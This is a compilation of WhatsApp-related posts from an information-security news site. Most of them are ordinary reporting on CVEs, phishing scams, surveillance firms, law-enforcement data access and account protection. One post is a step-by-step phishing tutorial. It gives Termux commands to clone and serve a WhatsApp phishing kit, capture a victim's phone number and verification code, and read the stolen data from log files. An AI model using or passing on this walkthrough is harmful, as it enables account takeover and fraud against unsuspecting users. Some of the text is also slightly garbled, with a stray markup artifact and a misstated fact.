After demonstrations broke out throughout Iran in September over the execution of Mahsa Amini, the Iranian authorities shut down the internet in order to prevent people from accessing it online.

Because of these shutdowns, many individuals are unable to communicate with their loved ones, according to a statement made by WhatsApp, which is owned by the firm Meta, which is controlled by Mark Zuckerberg. WhatsApp made this statement in a blog post.

In a message on their website, WhatsApp expressed their hope that “these internet shutdowns never occur” in the year 2023.

Disruptions such as the ones that have been going on for months and months in Iran deprive people of their human rights and prevent them from accessing needed assistance.

“However, in the event that these shutdowns persist, we hope that our option assists folks wherever there is a need for safe and dependable communication.”

Users will need to go to the Settings menu, choose ‘Storage and data,’ and then select ‘Proxy settings’ in order to turn on the option and input the address of a proxy server.

After being validated, it will establish the required connection between the user and the online resource or service that the user wishes to access.

According to WhatsApp, numerous proxy servers are put up throughout the globe by individuals and organizations to enable people to freely connect with one another.

Despite this, it has developed a portal that will instruct regular people on how to install a proxy server and “assist others connect.”

Even if proxy servers are used, WhatsApp communications will still be secured by a security standard known as end-to-end encryption. This protection is provided by WhatsApp itself.

With end-to-end encryption, the only people who can read a message are the two people participating in the conversation; no one else, not even the firm that owns the service, can access the information.

Every private communication that is transmitted using WhatsApp is said to be protected with end-to-end encryption by default. This messaging service was acquired by Zuckerberg’s company in 2014 for around $19 billion. WhatsApp

Despite this, end-to-end encryption is not a standard feature on any of the other Meta platforms.

For example, Facebook did not start testing end-to-end encryption as the default setting on the Messenger app until the previous year.

According to WhatsApp’s official statement, “connecting through proxy retains the same high degree of privacy and security that WhatsApp delivers.”

“Your personal messages will still be secured by end-to-end encryption,” which means that they will only be accessible to you and the person with whom you are conversing, and no one in between, including proxy servers, WhatsApp, or Meta, will be able to read them.

The post Now you can set up a proxy server to connect to WhatsApp if its blocked in a country appeared first on Information Security Newspaper | Hacking News.

CVE-2022-36934, which has a severe severity rating (CVSS score of 9.8), affects all Android and iOS versions previous to v2.22.16.12, Business for Android prior to v2.22.16.12, and Business for iOS prior to v2.22.16.12. Integer overflow is the root cause of this issue. Unknown code in the component Video Call Handler is vulnerable to this vulnerability. Overflow of a heap-based buffer results from the modification. Declaring the issue with CWE results in CWE-122. On 09/23/2022, the vulnerability was disclosed. Downloads of the advice are available at whatsapp.com. The CVE number for this issue is 2022-36934. Remote activation of the attack is possible. Technical information is not available.

Another flaw, identified as CVE-2022-27492, is an integer underflow that affects WhatsApp versions prior to 2.22.16.2 for Android and 2.22.15.9 for iOS. An attacker might take advantage of this weakness to run arbitrary code on the system by sending the system a specially crafted video file. This issue affects some unknown processing of the component Video File Handler. The manipulation leads to integer underflow. The CWE definition for the vulnerability is CWE-191. The weakness was disclosed 09/23/2022. The advisory is shared at whatsapp.com. The identification of this vulnerability is CVE-2022-27492. The attack may be initiated remotely. There are no technical details available. 

It is advised that WhatsApp users update to the most recent version to reduce the risk posed by the CVE-2022-36934 and CVE-2022-27492 issues. According to the business, there is no evidence that any of the vulnerabilities fixed in this version have been used maliciously.

The post Two critical WhatsApp vulnerabilities allow hacking WhatsApp (Android & iOS) via call or video file. Update immediately appeared first on Information Security Newspaper | Hacking News.

The UK-based firm has confirmed that this is not a legitimate offer and users of the messaging app should ignore this alleged promotion: “We have been informed about social media posts claiming to offer consumers a basket of free Easter chocolate… We can confirm that this has not been generated by us and we urge consumers not to interact.”

Some users responded to one of the company’s posts on Twitter, confirming that they had received the text message and even with testimonies from victims who fell into the trap by clicking on the attached link.

British authorities also issued a warning about this phishing campaign, asking users to ignore these messages in the face of the potential risk of handing over their personal information to individuals with questionable intentions. Mersyside Police say they are aware of how difficult it is to refuse a free chocolate, but strongly ask users not to interact with those messages.

This seems to be clearly a phishing scam in which criminals create attractive messages in order to trick users into handing over their personal information, mainly through a link to a fraudulent website with forms for data registration.

Finally, the UK’s National Cyber Security Centre advised users in general to think twice before clicking on any similar links, opening unsolicited messages or downloading suspicious attachments. Indicators such as misspellings, shortened URLs, and low-resolution images can help identify a potential phishing attack.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Do not open this WhatsApp message offering Free Cadbury Chocolates; hackers can empty your bank accounts appeared first on Information Security Newspaper | Hacking News.

End-to-end encryption in WhatsApp protects users’ messages from being read by intermediaries, although you can never have enough security, especially considering that things can change when users turn to the web version of the messaging app.

The extension was dubbed Code Verify and, according to Meta software engineer Richard Hansen, is based on a browser security feature called “subsource integrity,” which allows browsers to check if the files obtained have been altered in any way.

Code Verify analyzes the JavaScript code in WhatsApp Web, a process for which Cloudflare’s collaboration is required, since the high amount of resources required for a complete verification exceeds the capabilities of WhatsApp: “Cloudflare has a hash of the code that WhatsApp users should execute,” says the report on this extension.

When users run WhatsApp in their browser, WhatsApp’s code verification extension compares a hash of that code running in their browser to Cloudflare’s hash, allowing you to easily check if the code you’re running is the correct code.

At the moment, Code Verify is available for Google Chrome, Microsoft Edge, and Mozilla Firefox, with plans to expand to Safari in the short term. The tool runs immediately after installation to start validating WhatsApp JavaScript libraries. The green indicator confirms that everything is valid, orange if the page needs to be updated or another extension interferes with Code Verify, and red if a hash discrepancy has been detected, indicating a possible compromise.

This integrity verification extension could make users of WhatsApp and other services that implement Code Verity less likely to install extensions that alter social media functions and raise potential security issues, strengthening the user experience in terms of cybersecurity.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Check the integrity of the browser extension using this WhatsApp tool before running WhatsApp web appeared first on Information Security Newspaper | Hacking News.

This library provides an API that can be used by IP telephony applications, such as VoIP phones and video conferencing applications. It is used today by the most popular communication apps in the world, such as WhatsApp and BlueJeans.

Below are brief descriptions of the reported flaws, in addition to their respective identification keys and scores assigned under the Common Vulnerability Scoring System (CVSS).

CVE-2021-43299 (CVSS 8.1/10): The flaw lies in pjsua_player_create, which creates a file player and automatically adds it to the conference bridge. This feature contains a stack overflow vulnerability:

The filename->ptr feature is copied to the path without verifying that filename->slen has a maximum of the assigned path size, which is PJ_MAXPATH<c/ode> (260). Therefore, passing a file name longer than 260 characters will cause the stack to overflow.

CVE-2021-43300 & CVE-2021-43302 (CVSS 8.1/10): These flaws reside in pjsua_recorder_create(), tasked with creating a file recorder and automatically connects this recorder to the conference bridge, leading to a stack-based buffer overflow.

CVE-2021-43302 exists because pjsua_recorder_create does not check if the length of the file name is at least 4. If the file name is shorter than 4, pj_stricmp2 will cause an out-of-bounds read when comparing strings.

On the other hand, CVE-2021-43300 exists because filename->ptr is copied with memcpy to the path stack variable without verifying that filename->slen has at most the size assigned to the path, which is PJ_MAXPATH (260).

CVE-2021-43301 (CVSS 5.9/10): This is also a stack overflow flaw that affects pjsua_playlist_create, which creates a file playlist media port and automatically adds the port to the conference bridge. At startup, pjsua_playlist_create calls pjmedia_wav_playlist_create with the file_names argument assigned as file_list:

The function copies each file name from file_list to filename without checking whether its length is at most PJ_MAXPATH (260). If the length of the file name is longer, the stack-based buffer overflow is created.

CVE-2021-43303 (CVSS 5.9/10): Buffer overflow vulnerability in pjsua_call_dump, a function that downloads call statistics to a given buffer:

The function uses tmp to store the statistics temporarily and then copies them to the output argument buffer without validating that maxlen is at most len. This can cause a buffer overflow if the capacity of the given buffer parameter is less than len.

Fixing these flaws requires updating PJSIP to version 2.12, so developers recommend addressing the flaws as soon as possible.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post 5 critical vulnerabilities in the open-source API PJSIP affect millions of WhatsApp users. Update immediately appeared first on Information Security Newspaper | Hacking News.

The defendant marketed all sorts of tools and software solutions, including WiFi blockers and interceptors, IMSI receivers, spyware and other tools to hack messaging services such as WhatsApp to sell to potential customers in Mexico and the United States. According to the DOJ, many of its clients were politically and financially motivated.

In addition to the sale of these solutions, the defendant himself used some of the tools he purchased to intercept phone calls and spy on the emails of a rival trade consortium from Baja California, Mexico, in a deal costing nearly $25,000 USD.

U.S. Attorney Randy Grossman said, “This guilty plea will help stop the proliferation of digital tools used to compromise the safety of U.S. and Mexican citizens.” The prosecutor also reiterated his commitment to the detection and interruption of any cybercriminal operation in collaboration with the rest of government agencies.

So far it is unknown which companies and government agencies bought the software sold by Guerrero and which are the companies that sold these tools to the defendant. More information could be revealed when the case is closed. Guerrero is still waiting to hear his sentence.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post This Mexican businessman was charged for selling phone interception tools and spyware to companies and government agencies in Latin America appeared first on Information Security Newspaper | Hacking News.

A growing trend within phishing is the compromise of WhatsApp accounts, the largest instant messaging platform in the world. Threat actors take advantage of the fact that minimal resources are required for the deployment of a phishing campaign against users of the application, using tools available in any forum of dubious reputation.

This time, the ethical hacking experts of the International Institute of Cyber Security (IICS) will show you a simple phishing attack to attack WhatsApp accounts, using just a few commands. As usual, we remind you that this article was prepared for informational purposes only and should not be taken as a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

This attack is based on Termux, the popular terminal emulator for Android devices that allows you to run a Linux environment on a smartphone with specific requirements. Once we have installed Termux, we will have to open the tool and write the following commands one by one (enter “y” when the system asks to choose between Y/N):

apt update
apt upgrade
apt install git
git clone https://github.com/Ignitetch/Whatsapp-phishing
apt install php
cd Whatsapp-phishing
php -S localhost:8080 

Next, experts in ethical hacking recommend typing in the browser the following command:

http://localhost:8080

The victim enters a number, for example:

+74959999999

In the next step, choose Sign In:

Now we must enter the code received in the phone number, for example 12345678

After logging in, it redirects the user to web.whatsapp.com:

Return to the terminal, ethical hacking experts mention:

Swipe right and in the window below, press New Session

On this menu, type the following command:

cat log.txt && cat logs.txt

In response, we will receive data from the victim:

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to hack WhatsApp easily with a very effective Termux WhatsApp phishing website appeared first on Information Security Newspaper | Hacking News.

Mitto is a firm based in Switzerland and specialized in providing automated SMS messaging services for marketing campaigns, sending security codes, reminders and other practical applications. Mitto currently works with hundreds of organizations in more than 100 locations. Among Mitto’s main clients are tech giants such as Google, WhatsApp, Twitter, LinkedIn and Telegram, even working with Asian firms such as TikTok, Tencent and Alibaba, not to mention their partners in the phone operator industry.

An investigation by the Bureau of Investigative Journalism and reports shared by former employees claims that Ilja Gorelik, co-founder of Mitto, has been secretly selling access to the company’s networks for the identification and tracking of target users through their mobile devices and online profiles. According to the report, this practice was completely ignored by users and business customers, as it was only known to a small group within Mitto.

Gorelik and his accomplices contacted some surveillance companies in order to sell this service to various government agencies.

After the report’s release, Mitto issued a statement denying any connection to a surveillance operation, and an internal investigation was ordered to identify any possible malicious use of the company’s technology: “We will take corrective action should it be necessary,” Mitto concludes. The company also did not add further details about Gorelik and it is unknown if he is still working at the company.

The reports obtained by the researchers clearly contradict Mitto’s official stance; Two informants said that Gorelik ordered that custom software be added to the company’s networks to track certain users, a task carried out without any supervision, so they do not rule out its improper use.

Informants cited as an example a case in which the phone of a U.S. Department of State official was compromised for surveillance purposes in 2019. Former Mitto employees could not confirm which state actor was behind this follow-up campaign.

In addition to working with the aforementioned technology companies, Mitto collaborates with telephone operators such as Vodafone, Telefonica, MTN and Deutsche Tekekom. When questioned, most of the companies reserved any statement about it, while only one Vodafone representative responded by mentioning that they have collaborated with Mitto exclusively on SMS messaging services.

This investigation was possible thanks to the collaboration of dozens of people, including cybersecurity specialists and former employees of the company, in addition to the analysis of emails and internal documentation. While the people interviewed claim to have witnessed this practice, few people know the technical details behind the surveillance systems used by Mitto. The informants also mentioned that, to their knowledge, there is no evidence that this surveillance campaign has compromised additional information from companies using Mitto’s SMS service, although the company would have to allow a detailed investigation to know this for sure. 

These little-known practices, in addition to the work of firms such as NSO Group and its infamous Pegasus spyware, have become a national security issue for governments around the world, mainly in the U.S. Ron Wyden, a member of the U.S. Senate intelligence committee, mentions that, repeatedly, the U.S. Congress has warned about these security risks without the authorities being able to do anything about it.

At the moment, Mitto continues to address public relations issues, although everything seems to indicate that there is no intention to reveal more details about this surveillance system, which worries users, companies and privacy advocates alike.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post A company that sends SMS OTP codes on behalf of Google, Twitter, Facebook, etc. also helps governments to get precise locations of users appeared first on Information Security Newspaper | Hacking News.

Knodel shared with Rolling Stone a document from the Federal Bureau of Investigation (FBI) in which the Agency recognizes the ease with which it is possible to collect data from sources such as iMessage and WhatsApp, since only a court order is required. According to this document, Apple and Facebook applications are incredibly permissive when it comes to accessing their users’ information.

While Facebook (now known as Meta) and Apple have focused their marketing campaigns on the privacy of their services, hundreds of journalists, activists and users have pointed out how it is that law enforcement agencies exploit online platforms to extract information and collaborate with surveillance tasks in dozens of countries with repressive governments.

The FBI report, titled “Lawful Access” and published in early 2021 also emphasizes that these apps do a great job keeping hackers at bay, although they recognize that users are completely vulnerable to the activity of law enforcement agencies, which can resort to various legal avenues for the extraction of confidential data stored by these companies.

In addition to acknowledging this practice, the document includes detailed guidance on the type of information the agency can access through these legal requests, which span the world’s top 9 messaging apps, including WhatsApp, WeChat, iMessage, Telegram, Line, Signal, Wickr, and Facebook Messenger.

This document details how the FBI has at its disposal a whole legal team to obtain access to large amounts of information in the most popular messaging apps, used by billions of people around the world, so we can think that no one is safe from government surveillance.

Cybersecurity specialists point out that it is too unusual for law enforcement agencies to be able to access so much information, so the issue should concern users, government agencies and activists.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Leaked FBI document reveals how the agency can access data from WhatsApp, WeChat, iMessage, Telegram, Line, Signal, Wickr and Facebook Messenger appeared first on Information Security Newspaper | Hacking News.

Those interested in participating in this special program can contact the authorities through the official website of the Federal Bureau of Investigation (FBI) and through messaging platforms such as WhatsApp, Telegram and Signal.

Authorities specify that the reward applies to variants derived from DarkSide, including name changes such as BlackMatter ransomware. It should be remembered that rebranding is a common practice among ransomware operators; when these groups feel cornered by the authorities, they decide to shut down their operation only to return a couple of months later, using another name but with the same malware variant.

In the case of DarkSide, this variant was rebranded as BlackMatter after the attack on Colonial Pipeline, which wreaked severe havoc and brought all U.S. authorities to the capabilities of ransomware groups.

This week, cybersecurity specialists reported that BlackMatter was about to close its operation, announcing the closure through its dark web platform. This does not appear to be an impediment for authorities to continue investigating members of this operation, whose identification and arrest has become a priority for the U.S. government.

Finally, the State Department announced a $10 million reward to anyone who provides information related to any threat actor sponsored by a national state, hoping to mitigate the hackers’ ability to mount a new cybercriminal infrastructure immediately after shutting down the previous one.

For further reports on vulnerabilities, exploits, malware variants, cybersecurity risks and information security courses fell free to visit the International Institute of Cyber Security (IICS) websites, as well as the official platforms of technology companies.

The post U.S. Government offers $10 million USD reward for information leading to DarkSide ransomware operators appeared first on Information Security Newspaper | Hacking News.

Cybersecurity experts recently detected a new way to hijack WhatsApp accounts and take control of users’ contact lists that could affect millions of people. The good news is that you can prevent falling victim of this attack variant.

Before get started, users should know the tactics used by threat actors: The attack often starts with a text message posing as a contact on the users’ lists. Thus, the user receives the text containing a six-digit number from the WhatsApp platform arriving from the chat of their contacts: “Can you lend me some money? I will return it to you within 2 hours, please”, reads the message sent by threat actors posing as a victim relative or friend. Below we can see an example of this scam, reported by an unknown user in Mexico:

This will ultimately lead to the victim losing some money or having their WhatsApp account hijacked by the hackers, thus it can be used to further malicious tasks.

A fast and safe option to keep hackers away from our messaging platform accounts is enabling the two-factor authentication mechanism integrated in WhatsApp, which will request an additional identity validation. This setting can be done directly from your WhatsApp account in less than 5 minutes.

The first step to follow is to go to WhatsApp settings and click on the Account option, which gives the option to carry out the two-step validation. Once there you must add a password and an email address to your account to be able to reset your pin in case you forget your password and thus protect your account.

The reason for the hack is still unknown, however, the most frequent reasons are usually to take control over accounts within the platform and then extort the user to collect a ransom, ask for money, among others.

The problem, which is added to the hack itself, is that the criminal is left with access to all your contacts to repeat the modus operandi and get new victims who fall into his trap, only this time impersonating them.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post New WhatsApp attack is hijacking hundreds of accounts: How to prevent it? appeared first on Information Security Newspaper | Hacking News.

In hundreds of criminal investigation cases, authorities are always looking for information available from all sorts of sources, from oral testimony, evidence, and even posts and activity on social media and online platforms, including messaging apps.

Companies such as Facebook, Apple and various manufacturers of smartphones and other smart devices receive constant requests from the U.S. government to implement mechanisms that allow authorities to access confidential information on these platforms. For the fulfillment of these orders, platforms such as WhatsApp have begun to issue their own guidelines, rules to which developers submit to deliver information of their users to the authorities.

This is not the case with Signal, a messaging app focused on users’ privacy. According to a report by the company, the authorities continue to try to access the information of the users of this service, which is impossible considering that this platform does not store user information and such records do not exist on its servers.

In other words, Signal does not know the names, addresses, contact list, and call and message logs of any user.

In releasing a new subpoena received by its legal team, Signal confirmed that it sent authorities a response exactly the same as that issued with the previous subpoenas: In its dataset identified as “Account and Subscriber Information,” Signal only stores timestamps to identify when an account was created, last network connection, and other minor details.

In addition to the search warrant, the platform revealed that it received four consecutive non-disclosure orders on these requests. Signal concluded by mentioning that the court that issued the orders never confirmed receipt of a response or scheduled a hearing. The platform will continue to work continuously to maintain its commitment to user privacy, which needless to say does not violate any rule in current US legislation.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How police can try to get your Signal messaging apps records for investigation appeared first on Information Security Newspaper | Hacking News.